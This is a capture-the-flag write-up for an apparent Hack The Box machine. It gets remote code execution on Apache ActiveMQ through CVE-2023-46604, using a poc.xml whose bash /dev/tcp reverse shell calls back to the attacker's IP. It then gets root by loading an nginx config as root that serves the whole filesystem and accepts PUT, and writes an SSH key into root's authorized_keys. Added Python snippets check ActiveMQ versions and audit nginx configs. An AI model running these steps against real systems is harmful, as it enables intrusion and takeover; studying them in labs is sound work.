Information gathering

nmap

┌──(kali㉿kali)-[~]
└─$ sudo nmap -p- -min-rate 10000 10.10.11.243 -oA test/nmap
[sudo] kali 的密码:
Starting Nmap 7.94 ( https://nmap.org ) at 2024-01-27 12:12 CST
Nmap scan report for 10.10.11.243 (10.10.11.243)
Host is up (0.074s latency).
Not shown: 65524 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
1337/tcp open waste
1338/tcp open wmc-log-svc
1883/tcp open mqtt
5672/tcp open amqp
8161/tcp open patrol-snmp
44455/tcp open unknown
61613/tcp open unknown
61614/tcp open unknown
61616/tcp open unknown

There are quite a few ports, so I collect them into a variable for later use.

┌──(kali㉿kali)-[~]
└─$ ports=$(grep open test/nmap.nmap |awk -F '/' '{print $1}'|paste -sd ',')

┌──(kali㉿kali)-[~]
└─$ echo $ports
22,80,1337,1338,1883,5672,8161,44455,61613,61614,61616

A more detailed scan of those ports

┌──(kali㉿kali)-[~]
└─$sudo nmap -sT -sV -sC -O -p$ports 10.10.11.243 -oA test/details
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 3e:ea:45:4b:c5:d1:6d:6f:e2:d4:d1:3b:0a:3d:a9:4f (ECDSA)
|_ 256 64:cc:75:de:4a:e6:a5:b4:73:eb:3f:1b:cf:b4:e3:94 (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Error 401 Unauthorized
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ basic realm=ActiveMQRealm
1337/tcp open http nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: 403 Forbidden
1338/tcp open http nginx 1.18.0 (Ubuntu)
| http-ls: Volume /
| maxfiles limit reached (10)
| SIZE TIME FILENAME
| - 06-Nov-2023 01:10 bin/
| - 06-Nov-2023 01:10 bin/X11/
| 963 17-Feb-2020 14:11 bin/NF
| 129576 27-Oct-2023 11:38 bin/VGAuthService
| 51632 07-Feb-2022 16:03 bin/%5B
| 35344 19-Oct-2022 14:52 bin/aa-enabled
| 35344 19-Oct-2022 14:52 bin/aa-exec
| 31248 19-Oct-2022 14:52 bin/aa-features-abi
| 14478 04-May-2023 11:14 bin/add-apt-repository
| 14712 21-Feb-2022 01:49 bin/addpart
|_
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Index of /
1883/tcp open mqtt
|_mqtt-subscribe: Failed to receive control packet from server.
5672/tcp open amqp?
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP, GetRequest, HTTPOptions, RPCCheck, RTSPRequest, SSLSessionReq, TerminalServerCookie:
| AMQP
| AMQP
| amqp:decode-error
|_ 7Connection from client using unsupported AMQP attempted
|_amqp-info: ERROR: AQMP:handshake expected header (1) frame, but was 65
8161/tcp open http Jetty 9.4.39.v20210325
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ basic realm=ActiveMQRealm
|_http-server-header: Jetty(9.4.39.v20210325)
|_http-title: Error 401 Unauthorized
44455/tcp open tcpwrapped
61613/tcp open stomp Apache ActiveMQ
| fingerprint-strings:
| HELP4STOMP:
| ERROR
| content-type:text/plain
| message:Unknown STOMP action: HELP
| org.apache.activemq.transport.stomp.ProtocolException: Unknown STOMP action: HELP
| org.apache.activemq.transport.stomp.ProtocolConverter.onStompCommand(ProtocolConverter.java:258)
| org.apache.activemq.transport.stomp.StompTransportFilter.onCommand(StompTransportFilter.java:85)
| org.apache.activemq.transport.TransportSupport.doConsume(TransportSupport.java:83)
| org.apache.activemq.transport.tcp.TcpTransport.doRun(TcpTransport.java:233)
| org.apache.activemq.transport.tcp.TcpTransport.run(TcpTransport.java:215)
|_ java.lang.Thread.run(Thread.java:750)
61614/tcp open http Jetty 9.4.39.v20210325
|_http-server-header: Jetty(9.4.39.v20210325)
|_http-title: Site doesn't have a title.
| http-methods:
|_ Potentially risky methods: TRACE
61616/tcp open apachemq ActiveMQ OpenWire transport
| fingerprint-strings:
| NULL:
| ActiveMQ
| TcpNoDelayEnabled
| SizePrefixDisabled
| CacheSize
| ProviderName
| ActiveMQ
| StackTraceEnabled
| PlatformDetails
| Java
| CacheEnabled
| TightEncodingEnabled
| MaxFrameSize
| MaxInactivityDuration
| MaxInactivityDurationInitalDelay
| ProviderVersion
|_ 5.15.15

TCP-80

Authentication is required.

The weak credentials "admin"/"admin" work. Logging into the ActiveMQ management console:

The console shows the ActiveMQ version number, which is worth noting: "5.15.15"

user-activemq

A blog post by X1r0z covers this: Apache ActiveMQ (version < 5.18.3) RCE analysis
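As an added defender-side check (not from the original writeup), the "< 5.18.3" threshold is a simplification: the Apache advisory for CVE-2023-46604 fixed each maintained branch separately (5.15.16, 5.16.7, 5.17.6, 5.18.3), so a version must be compared against the fix on its own branch. The treatment of branches newer than 5.18 is an assumption of this example.

```python
# Added example, not from the original writeup: classify an ActiveMQ version
# against the fixed releases for CVE-2023-46604 (from the Apache advisory).
import re

# Fixed release per branch; anything older on the same branch is affected,
# and every release before 5.15.16 is affected regardless of branch.
FIXED_VERSIONS = ("5.15.16", "5.16.7", "5.17.6", "5.18.3")


def parse_version(text):
    """Extract x.y.z from '5.15.15' or a banner such as 'ActiveMQ 5.15.15'."""
    m = re.search(r"(\d+)\.(\d+)\.(\d+)", text)
    if not m:
        raise ValueError("no x.y.z version in %r" % text)
    return tuple(int(p) for p in m.groups())


def is_vulnerable_to_cve_2023_46604(text):
    """True if the version predates the fixed release of its branch."""
    ver = parse_version(text)
    fixed = {parse_version(f)[:2]: parse_version(f) for f in FIXED_VERSIONS}
    branch = ver[:2]
    if branch in fixed:
        return ver < fixed[branch]
    if branch < min(fixed):
        return True                  # older branch that never received a fix
    # Assumption for this example: branches newer than 5.18 (e.g. 6.x) were
    # cut after the fix and are treated as not affected.
    return False
```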

A good PoC can be found on GitHub: CVE-2023-46604

I cloned the PoC locally and changed the IP and port in poc.xml to my local IP and the port nc will listen on.

┌──(kali㉿kali)-[~/htb/machines/broker/CVE-2023-46604]
└─$ ls -al
总计 24
drwxr-xr-x 3 kali kali 4096 1月27日 11:51 .
drwxr-xr-x 3 kali kali 4096 1月27日 11:49 ..
-rw-r--r-- 1 kali kali 1828 1月27日 11:49 exploit.py
drwxr-xr-x 8 kali kali 4096 1月27日 11:49 .git
-rw-r--r-- 1 kali kali 666 1月27日 11:51 poc.xml
-rw-r--r-- 1 kali kali 2082 1月27日 11:49 README.md

┌──(kali㉿kali)-[~/htb/machines/broker/CVE-2023-46604]
└─$ cat poc.xml
<?xml version="1.0" encoding="UTF-8" ?>
<beans xmlns="http://www.springframework.org/schema/beans"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="
http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
<bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
<constructor-arg>
<list>
<value>bash</value>
<value>-c</value>
<value>bash -i &gt;&amp; /dev/tcp/10.10.16.17/5555 0&gt;&amp;1</value>
</list>
</constructor-arg>
</bean>
</beans>

So that the target can fetch poc.xml, I started nginx locally, listening on port 80.

Start nc

nc -lnnp 5555

Run the PoC to get RCE

python3 exploit.py -i 10.10.11.243 -p 61616 -u http://10.10.16.17/poc.xml

We get a shell as the activemq user

activemq@broker:/home$ id
uid=1000(activemq) gid=1000(activemq) groups=1000(activemq)

user-root

Standard privilege checks

activemq@broker:/home$ sudo -l
sudo -l
Matching Defaults entries for activemq on broker:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
use_pty

User activemq may run the following commands on broker:
(ALL : ALL) NOPASSWD: /usr/sbin/nginx

The activemq user can run nginx as root.

I can craft a malicious config file that sets user to root and the web root to /, which makes every file on the system readable.

user root;
events {
worker_connections 1024;
}
http {
server {
listen 1337;
root /;
autoindex on;
}
}

Then use nginx's -c flag to point it at that config file

sudo /usr/sbin/nginx -c /home/activemq/shell.config

netstat -ltunp shows that port 1337 is now listening

┌──(kali㉿kali)-[/var/log/nginx]
└─$ curl http://10.10.11.243:1337/root/root.txt
5f68e0f2578b1608db7db4ffa55bba46

Besides reading files, nginx can also handle PUT requests that write files. I update the config to enable PUT.

user root;
events {
worker_connections 1024;
}
http {
server {
listen 1338;
root /;
autoindex on;
dav_methods PUT;
}
}
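As an added defender-side check, not part of the original writeup: a small audit that flags the directives that make the two configs above dangerous (user root, root /, autoindex on, and write-capable dav_methods). The parser is a minimal hand-written one for nginx's directive/block syntax, and the sample config embedded as SAMPLE is the second config above, constructed here as test input.

```python
# Added example, not from the writeup: flag the nginx directives that make the configs above dangerous.
import re

RISKY_DAV = {"PUT", "DELETE", "MKCOL", "COPY", "MOVE"}
SAMPLE = """user root;
events { worker_connections 1024; }
http { server { listen 1338; root /; autoindex on; dav_methods PUT; } }"""

def parse_nginx(text):
    # Tokens are braces, semicolons and bare words; comments are stripped first.
    tokens = re.findall(r"[{};]|[^\s{};]+", re.sub(r"#[^\n]*", "", text))
    pos = 0
    def block():
        nonlocal pos
        items = []                                  # (name, args, children-or-None)
        while pos < len(tokens) and tokens[pos] != "}":
            args = []
            while tokens[pos] not in ("{", ";"):
                args.append(tokens[pos])
                pos += 1
            if tokens[pos] == ";":                  # simple directive
                items.append((args[0], args[1:], None))
            else:                                   # block directive: skip "{", parse body
                pos += 1
                items.append((args[0], args[1:], block()))
            pos += 1                                # skip the ";" or the closing "}"
        return items
    return block()

def audit_nginx(text):
    return _audit(parse_nginx(text), None)
def _audit(items, root):
    findings = []
    for name, args, children in items:
        if name == "user" and args[:1] == ["root"]:
            findings.append("user root: worker processes run as root")
        elif name == "root" and args:
            root = args[0]                          # applies to following siblings too
            if root == "/":
                findings.append("root /: the whole filesystem is served")
        elif name == "autoindex" and args == ["on"] and root == "/":
            findings.append("autoindex on under root /: directory listing of /")
        elif name == "dav_methods":
            risky = sorted(RISKY_DAV & {a.upper() for a in args})
            if risky:
                findings.append("dav_methods %s under root %s: clients can write files" % (",".join(risky), root))
        if children is not None:
            findings.extend(_audit(children, root))
    return findings
```

On the host itself the root cause is the sudo rule, since NOPASSWD nginx with an unrestricted -c argument lets any config be loaded as root; an audit like this only catches such configs once they exist on disk.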

Write my public SSH key into root's authorized_keys file

curl -X PUT localhost:1338/root/.ssh/authorized_keys -d 'ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIDIK/xSi58QvP1UqH+nBwpD1WQ7IaxiVdTpsg5U19G3d nobody@nothing'

Then just ssh in with the matching private key.